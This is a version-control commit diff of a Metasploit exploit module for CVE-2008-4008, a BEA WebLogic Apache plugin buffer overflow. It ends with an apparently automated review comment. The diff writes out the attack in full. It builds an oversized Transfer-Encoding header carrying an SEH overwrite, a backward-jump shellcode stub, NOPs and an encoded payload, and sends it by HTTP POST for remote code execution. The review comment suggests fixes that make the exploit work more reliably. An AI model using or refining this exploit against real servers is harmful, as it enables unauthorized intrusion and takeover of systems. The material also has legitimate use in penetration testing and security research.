convert module to HttpClient, check fingerprint -- untested

git-svn-id: file:///home/svn/framework3/trunk@9704 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-07-07 01:43:12 +00:00
parent dfce4901fe
commit 163d273dff
1 changed files with 20 additions and 17 deletions


@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-4008' ],
[ 'OSVDB', '49283' ],
[ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'],
],
'DefaultOptions' =>
{
@ -57,30 +56,34 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Sept 09 2008',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self.class )
end
def exploit
if not (http_fingerprint =~ /Apache/)
raise RuntimeError, "The target server doesn't appear to be running Apache."
end
sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars)
sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V')
sploit = rand_text_alphanumeric(5800)
sploit[5781, 8] = generate_seh_record(target.ret)
# Jump backward to the payload
sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"
sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded
request =
"POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " +
sploit +
"\r\n\r\n"
datastore['VHOST'] = 'localhost'
send_request_cgi(
{
'method' => 'POST',
'url' => '/index.jsp',
'data' => '',
'headers' =>
{
'Transfer-Encoding' => sploit
}
})
handler
connect
sock.put(request);
disconnect
end
end
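Review bot: The new `datastore['VHOST'] = 'localhost'` in exploit silently overwrites whatever VHOST the operator configured, every time the module runs, and does so through a side effect on the datastore rather than through the request itself. Since HttpClient already builds the Host header from VHOST, the same result is obtained without clobbering user input by adding `'VHOST' => 'localhost'` to the module's existing DefaultOptions hash, or by passing `'Host' => 'localhost'` in the headers hash next to `'Transfer-Encoding' => sploit`. Separately, the new fingerprint guard `if not (http_fingerprint =~ /Apache/)` also fires when http_fingerprint returns nil because the target never answered, so the "doesn't appear to be running Apache" message would be misleading in that case; consider `fp = http_fingerprint` followed by `raise RuntimeError, "No HTTP response from target" unless fp` before the regex check. Note too that send_request_cgi waits for a reply that a crashed worker will never send, so the call is expected to block until its timeout before `handler` runs; the commit message itself marks this untested, so passing a short explicit timeout is worth checking.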